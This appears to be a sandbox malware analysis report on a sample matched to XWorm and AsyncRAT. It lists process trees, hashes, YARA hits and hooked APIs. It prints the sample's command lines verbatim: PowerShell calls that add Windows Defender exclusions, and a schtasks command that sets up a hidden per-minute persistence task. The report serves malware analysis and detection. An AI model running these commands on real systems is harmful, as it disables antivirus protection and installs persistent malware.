Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	16:45:01
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:45:01
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	16:45:15
Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wasdwasfwasfs.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	16:45:15
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	16:45:15
Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'adawsfaefasfasfg.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	16:45:15
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	16:45:48
Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	16:45:48
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	16:46:14
Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Systen User'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	16:46:14
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	16:46:47
Start date:	06/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User"
Imagebase:	0x7ff6e8170000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	16:46:47
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	16:46:48
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\Systen User
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Systen User"
Imagebase:	0xff0000
File size:	43'520 bytes
MD5 hash:	190010C187189B92E49A0ED05F6DDC88
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Systen User, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	16:46:59
Start date:	06/12/2024
Path:	C:\Windows\System32\OpenWith.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\OpenWith.exe -Embedding
Imagebase:	0x7ff6a0cd0000
File size:	123'984 bytes
MD5 hash:	E4A834784FA08C17D47A1E72429C5109
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	16:47:00
Start date:	06/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FF887D20969 Relevance: 2.8, Strings: 2, Instructions: 268COMMON

Download Yara Rule

Strings

(QC, xrefs: 00007FF887D20C66
(QC, xrefs: 00007FF887D209F4

Memory Dump Source

Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd

Similarity

API ID:
String ID: (QC$(QC
API String ID: 0-978734326
Opcode ID: 59ba83d3fd96051810deaa55c175957d4c65104541454cdfd3128995b60e423a
Instruction ID: a7c200ab2590358f32bf473d097c99d9bee4392003191de3711b96b66171e73f
Opcode Fuzzy Hash: 59ba83d3fd96051810deaa55c175957d4c65104541454cdfd3128995b60e423a
Instruction Fuzzy Hash: C6A16070A699098FEB98DB68D4587ADB7F2FF94350F504269D01AD32E5CF38A846CB40

Function 00007FF887D20F09 Relevance: 2.6, Strings: 2, Instructions: 67COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF887D20F6F
8[L, xrefs: 00007FF887D20F33

Memory Dump Source

Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd

Similarity

API ID:
String ID: 8[L$r6B
API String ID: 0-3374649634
Opcode ID: 523df64800aa6ca7684134f2cfbc11b7852df87bbba128dcf52bf1d1516c5bc1
Instruction ID: 09be6eb2c4ba79883d0396b2402fa44a37799ae5a14a2dadd4f7a2ccf57423c9
Opcode Fuzzy Hash: 523df64800aa6ca7684134f2cfbc11b7852df87bbba128dcf52bf1d1516c5bc1
Instruction Fuzzy Hash: B4112B11EAD58A0FF394A67C68A96F9ABF5EF85690B8402B5D01EC319ADE0C7843C241

Function 00007FF887D204A0 Relevance: 2.6, Strings: 2, Instructions: 56COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF887D20F6F
8[L, xrefs: 00007FF887D20F33

Memory Dump Source

Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd

Similarity

API ID:
String ID: 8[L$r6B
API String ID: 0-3374649634
Opcode ID: f6b0a154b72f511876603c1000c5d1531c33e09231eed888785b921911383a5b
Instruction ID: fb9400767fdaf807ca08a1501f171eef192f5d42fb04ae271f4df4ff56bb10d8
Opcode Fuzzy Hash: f6b0a154b72f511876603c1000c5d1531c33e09231eed888785b921911383a5b
Instruction Fuzzy Hash: E7F0D612FA844A0FF2A4B6BD28A92F956E6EB88690B800175D11FC329ADE0C68438201

Function 00007FF887D20D90 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

8eL, xrefs: 00007FF887D20E3D

Memory Dump Source

Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd

Similarity

API ID:
String ID: 8eL
API String ID: 0-2915619072
Opcode ID: c4a79bd38695ba17e357a5fc8616de3a34b448dc8876c3fb755cba63d128070f
Instruction ID: ee65eefd8109dddadbb972a66a703c5a03dd382c344e118fc3a4170f51f4592c
Opcode Fuzzy Hash: c4a79bd38695ba17e357a5fc8616de3a34b448dc8876c3fb755cba63d128070f
Instruction Fuzzy Hash: E331BA6288E3C21FD34357745C664A57FB0AE5722070E41EBD4D9CB5E3E50C698BC322

Function 00007FF887D21131 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c45e0150f334b11677be8fc1d3221b5f6c6d6544332929c781db8759054a43f
Instruction ID: c2b579dc3a6654a704f93357f307adbf8619f4df273ebef6d85ee672b569c37b
Opcode Fuzzy Hash: 3c45e0150f334b11677be8fc1d3221b5f6c6d6544332929c781db8759054a43f
Instruction Fuzzy Hash: 61219531F189495FEB84EB6888997BD77E2FF99341B4400BAE40EC3293DE18A8428741

Function 00007FF887D20498 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66920b503e912e6ac7c8023bfd00626f15bcbb780fe4e2cac51c5d0ee9e9e680
Instruction ID: 0282594b3f424fa9485df1760ce9f9566689596b48565cadb367c37797ddb50a
Opcode Fuzzy Hash: 66920b503e912e6ac7c8023bfd00626f15bcbb780fe4e2cac51c5d0ee9e9e680
Instruction Fuzzy Hash: E8217431F1894D5FEB94FB6888997BD67E2FF98341B44017AE40EC3292DE28A8418741

Function 00007FF887D20E81 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 422710c50a05670563e02e7e385cac5cc960be5ca2c9e55eed4f6e1d5fa2e8c6
Instruction ID: c851255902e581769950a055a11c58f1a9f2d59e23fe0202af83eb755636e804
Opcode Fuzzy Hash: 422710c50a05670563e02e7e385cac5cc960be5ca2c9e55eed4f6e1d5fa2e8c6
Instruction Fuzzy Hash: 7301DB30A6D6494FD355A66C94952A973E2FF88644B440579C44AC7296DF2CF8428782

Function 00007FF887D204A8 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aa1478cc14775e73c780a34a15104b3532b9504098b7fc273d741d58cb5b53b
Instruction ID: fd9859436782587520a5a2a660f243e273197c961a93ae5211672bd397e7d63b
Opcode Fuzzy Hash: 1aa1478cc14775e73c780a34a15104b3532b9504098b7fc273d741d58cb5b53b
Instruction Fuzzy Hash: 00F0FF30A6C55A4BD358B66CA4452BE73E2FF8C744B500639D04EC728ACE2CB8428382

Function 00007FF887D204B0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a31825f3650e8214d8874c237c289380a4d783b91462b0024d6555b15cb670
Instruction ID: 7136a369707687844305e81dc44c7fe7afea6c66dd76f35271f52e0bfb093282
Opcode Fuzzy Hash: 07a31825f3650e8214d8874c237c289380a4d783b91462b0024d6555b15cb670
Instruction Fuzzy Hash: E2F0DC30A689198BD798BA2C94496BE73E2FF8C740B400539D00FC3399DF2CA8428782

Non-executed Functions

Function 00007FF887D2036D Relevance: 6.4, Strings: 5, Instructions: 139COMMON

Download Yara Rule

Strings

P/_, xrefs: 00007FF887D203E9
H1_, xrefs: 00007FF887D20399
8,_, xrefs: 00007FF887D203F9
-_, xrefs: 00007FF887D20439
(0_, xrefs: 00007FF887D20419

Memory Dump Source

Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd

Similarity

API ID:
String ID: (0_$8,_$H1_$P/_$-_
API String ID: 0-1503956390
Opcode ID: 2e39ba45922dd0e9ba160a824ce111cc0e7b89fb8b053a76533e70290b0b9ddc
Instruction ID: bfa50c2fca007cd53bd6ac97bdeded1d33ca3047f035795b6003c7fdc10f96cb
Opcode Fuzzy Hash: 2e39ba45922dd0e9ba160a824ce111cc0e7b89fb8b053a76533e70290b0b9ddc
Instruction Fuzzy Hash: D041B762D5E6C24FE3164679281517C6FB0BF536A0B4845FBC0AD870EBEB0CB81AC341

Analysis Process: adawsfaefasfasfg.exePID: 7732, Parent PID: 7644COMMON

Execution Graph

Execution Coverage:	23.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	15.8%
Total number of Nodes:	19
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF887D212D9 Relevance: 13.3, Strings: 10, Instructions: 834
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6B, xrefs: 00007FF887D217F1
"rB, xrefs: 00007FF887D21815
6B, xrefs: 00007FF887D218AE
8ML, xrefs: 00007FF887D21A15
0DL, xrefs: 00007FF887D21AC0
CAO_^, xrefs: 00007FF887D21583
0DL, xrefs: 00007FF887D21A4B
0DL, xrefs: 00007FF887D21B11
6B, xrefs: 00007FF887D219DA
6B, xrefs: 00007FF887D2193E

Memory Dump Source

Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd

Similarity

API ID:
String ID: 6B$6B$6B$6B$"rB$0DL$0DL$0DL$8ML$CAO_^
API String ID: 0-295822469
Opcode ID: cb3b79cd452a3497cd3c0b3b8b65826e0143a0f10044f48b8bb7776443938371
Instruction ID: aa11bdf8e7b0e5d61db3a46dc71a05ce5f0d64d087031b0092a454dff13c0b2f
Opcode Fuzzy Hash: cb3b79cd452a3497cd3c0b3b8b65826e0143a0f10044f48b8bb7776443938371
Instruction Fuzzy Hash: 72427420F28A494BE794FB7C84597BDB7E2FF98740F5445B9D00EC3296DE2DA8028742

Function 00007FF887D27681 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FF887D27730

Memory Dump Source

Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: b0d94ec3de05824ff32a261d1be5ed4337d607589567e2ff3f6e841d63c889b1
Instruction ID: bca7d16ad4bb6d1e10ac955ced31cc3ecf1201fbe4b61e18d97abca1ac64f62c
Opcode Fuzzy Hash: b0d94ec3de05824ff32a261d1be5ed4337d607589567e2ff3f6e841d63c889b1
Instruction Fuzzy Hash: 5931003190865C8FCB58DF98C8467ED7BF0FF65321F0542AAD48AD7292DB34A846CB91

Function 00007FF887D21CFD Relevance: 1.5, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF887D21DD2

Memory Dump Source

Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd

Similarity

API ID:
String ID: r6B
API String ID: 0-2624010786
Opcode ID: f817390d5beb400f56e2d0fb32fe7801c4d1752ac1fdb828f61f28962b92cd48
Instruction ID: 19cf75d6ede13f738325383016d5c86dfe1485afdea7e3d1b97ddff284fb5f40
Opcode Fuzzy Hash: f817390d5beb400f56e2d0fb32fe7801c4d1752ac1fdb828f61f28962b92cd48
Instruction Fuzzy Hash: 0651FF20A6D6C99FD786AB7858243797FE1EF87255B0805FBE08AC71D7DE0C6846C342

Function 00007FF887D25CC6 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1672595748dcc29f7b9112a63d5138b12226c90b31664ac3f1a144bdb86d2261
Instruction ID: bc198bca2242e90bd7da06d9dba10615c30387d21c635b97045fab79bf714fce
Opcode Fuzzy Hash: 1672595748dcc29f7b9112a63d5138b12226c90b31664ac3f1a144bdb86d2261
Instruction Fuzzy Hash: 3EF1A530918A4D8FEBA8DF28C855BE977E1FF55351F04426AD84EC7295DB38A841CB82

Function 00007FF887D26A72 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 808bdce857de70c556a11b0edc867eaf4dde6d46372371d3b165a0072a181713
Instruction ID: b5e5d0ae7507fef4b041844cd3d8043709fdb878d8c9e0eee5032c13fa3defc8
Opcode Fuzzy Hash: 808bdce857de70c556a11b0edc867eaf4dde6d46372371d3b165a0072a181713
Instruction Fuzzy Hash: D1E1C230918A4E8FEBA8EF28C8557E977E1FB55351F04426ED80EC7695CF78A841CB81

Function 00007FF887D28E40 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e59c278e849b7f3da06a90c74a18b8f9fadcf8a9027adcbb37873dbacef0077
Instruction ID: 3942d57f7a7c451ed846fadfe5a254b6e73515c568c978d13b914d81b7468191
Opcode Fuzzy Hash: 8e59c278e849b7f3da06a90c74a18b8f9fadcf8a9027adcbb37873dbacef0077
Instruction Fuzzy Hash: E441263191CA894FD719DB6C98452FDBBE0FF66350F0442BED05EC7192DA287806C782

Function 00007FF887D28E00 Relevance: 1.6, APIs: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FF887D29B41

Memory Dump Source

Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 148c342025685a9541a041dd404ea11030226181594a3c241784adbf9d989f04
Instruction ID: 057517bfad075422cb560cae43ef9cf782a060d52e40317d87cf152aa2a1bcbb
Opcode Fuzzy Hash: 148c342025685a9541a041dd404ea11030226181594a3c241784adbf9d989f04
Instruction Fuzzy Hash: 6641F731A1CA494FDB58EB68D8456BDBBE0FF65351F14427ED05ED3192CA687802C781

Function 00007FF887D292BD Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FF887D29392

Memory Dump Source

Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 4736e5c69d7a914d879145ef28c65f97f36187cec986a43322457ba7648d7ecb
Instruction ID: 13df4d48e5f54b597af38269505d6b3094cf6a29126aa73096fb5ff85d2563cb
Opcode Fuzzy Hash: 4736e5c69d7a914d879145ef28c65f97f36187cec986a43322457ba7648d7ecb
Instruction Fuzzy Hash: 2F41033180C6498FC718DFA8D845BE9BBF0FF56311F04416EE09AC3692CB78A846CB91

Function 00007FF887D29A78 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FF887D29B41

Memory Dump Source

Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: c581811641039e020e5e735742808af5e513c56791bfcd2a855c58f7d1800576
Instruction ID: 7fa090dcf4e7db02d8ba7367f16034df5d0422a1daebeabca738e0212c6c0032
Opcode Fuzzy Hash: c581811641039e020e5e735742808af5e513c56791bfcd2a855c58f7d1800576
Instruction Fuzzy Hash: 8E31C630A1CA494FDB58EB68D8466F9BBE1FB59321F00427ED05ED3192CA64B812CB81

Function 00007FF887D28E20 Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FF887D29B41

Memory Dump Source

Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 048a4d91a85386b65faf84d113e7dab34600ec4760398e2ec21d6c38e40672db
Instruction ID: a67d746b46c1f0cad64490b5660af46bfae88311f11386da310ee276fd0f1949
Opcode Fuzzy Hash: 048a4d91a85386b65faf84d113e7dab34600ec4760398e2ec21d6c38e40672db
Instruction Fuzzy Hash: 8831D570A1CA598FDB58EB5CD8467BDBBE1FB69321F10427ED00ED3196CA64B802C781

Analysis Process: wasdwasfwasfs.exePID: 7756, Parent PID: 7644COMMON

Execution Graph

Execution Coverage:	17.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF887D184AD Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FF887D18582

Memory Dump Source

Source File: 00000003.00000002.2694391367.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff887d10000_wasdwasfwasfs.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 36e5c4065cb797dae9dfc7303142166707538742a91f0f5e0f7493b1b482c18c
Instruction ID: 24cb53c228762efecee423ae9f3105350d93df723bd0d6c3487134719d5f69d7
Opcode Fuzzy Hash: 36e5c4065cb797dae9dfc7303142166707538742a91f0f5e0f7493b1b482c18c
Instruction Fuzzy Hash: 8541F53190C6498FDB18DF98D849BE9BBF0FF56311F04416EE09AC3692CB786846CB91

Function 00007FF887D19228 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FF887D192F1

Memory Dump Source

Source File: 00000003.00000002.2694391367.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff887d10000_wasdwasfwasfs.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 60f2ea27d76a7cc96114ad184c9722d212ffeedc9781071558e5d33a1d48f786
Instruction ID: 6011b70b535bf3dacdbb2a6d513ba3be38fb637d26339b7b4eaeb093bc530a86
Opcode Fuzzy Hash: 60f2ea27d76a7cc96114ad184c9722d212ffeedc9781071558e5d33a1d48f786
Instruction Fuzzy Hash: DD41F830A4CA4D8FDB58DB58D8066FDBBE1FB69321F04027ED04EC3292CE64A812C781

Function 00007FF887D169F1 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

